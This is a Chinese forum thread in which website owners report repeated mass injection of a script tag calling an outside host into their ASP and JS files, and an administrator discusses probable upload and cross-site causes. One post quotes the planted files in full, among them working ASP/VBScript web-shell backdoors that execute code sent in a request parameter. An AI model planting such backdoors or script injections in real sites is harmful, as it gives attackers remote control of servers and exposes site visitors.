代码漏洞问题!!被挂马网站火速集结中……
我的网站:ems-rc.com
每个index.asp和js文件都被写入:
<scriptsrc=http://mdsfd.cn></script>
我删除了.过不了多久又没被写入了..
始终要有个解决办法呀..
高手们..管理员..一定要看,解决哦..必竟是个大问题...
管理员:遇到此问题的朋友请将站点日志发上来,请提供站点日志+文件被修改时间以备我们尽快解决此问题。 自己顶一下啦!!! 这种写入的是入侵者通过木马文件进行的批量挂马,木马的来源不好判断,程序方面木马来源就是通过上传木马文件,普及版已经对上传的文件作了木马文件检测,也就是说不是通过程序里的上传功能放上来的木马,很多朋友说后台备份可以把木马图片还原成木马ASP文件,现在程序上传的部分已经完全闭掉了上传木马伪装图片的可能,所以,后台备份数据库功能是安全的.还有现在很多都通过跨站,直接拿服务器来攻击部分站点,这种情况一般都是虚拟主机空间不是很安全,从这个站点上传了木马可以跨到同服务器其他站点,最终实现攻击到目标攻击的站点.当然这种情况的话,那就算你的网站很安全,照样会被批量挂马.
楼主可以检查一下程序里边的文件,看有没有可疑的文件,文件大小一般都在70-80K左右,如果有木马文件,可能程序还存在问题,如果没有,就可能是后边的情况,通过别的站点入侵过来的. 管理员。。我查看了服务器
在DataBase目录下创建了一个inc.asp文件夹。里面创建了一个data.mdb 只有4K。打不开。把后缀改为.asp后,里面写的是:
<script language=VBScript runat=server>if request(chr(35))<>\"\"then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>
在admin和webad目录下创建了一个index.的目录,里面是空的。
在more目录下创建了一个inedx.asp文件。里面写的是:<%ExecuteGlobal request(chr(35))%>
如有需要,我可以打包发给你。整站。QQ:5754355
请管理员分析一下是什么原因?到底是程序本身的问题,还是。。。。盼回复!!
嘉缘是个品牌,嘉缘是精益求精的团队。嘉缘会很认真的面对问题的。 跟你同样的遭遇。几十次之多了,每隔几天就来一次。没有什么办法。都是重传程序。空间商一直说他的服务器设置不会出现跨站攻击的。我换用两家服务器都没有避免被挂马。并且都是这马。这边程序也查不出来源。无奈呀。期待谁有好方法。 admin还是帮助看一下呀..帮助解决这个问题吧...
谢谢了!!!!
万分感谢!!! 继续顶,该引起重视了,整天重传程序也不是个办法呀 请联系320133806 家园的人呢???这是程序的问题 我的网站每天都被挂楼主那样的木马 手法和木马地址一模一样
家园的人不要闭门造车了 你们的程序又被黑客拿下了
赶快想想办法吧 我都快愁死了
页:
[1]
2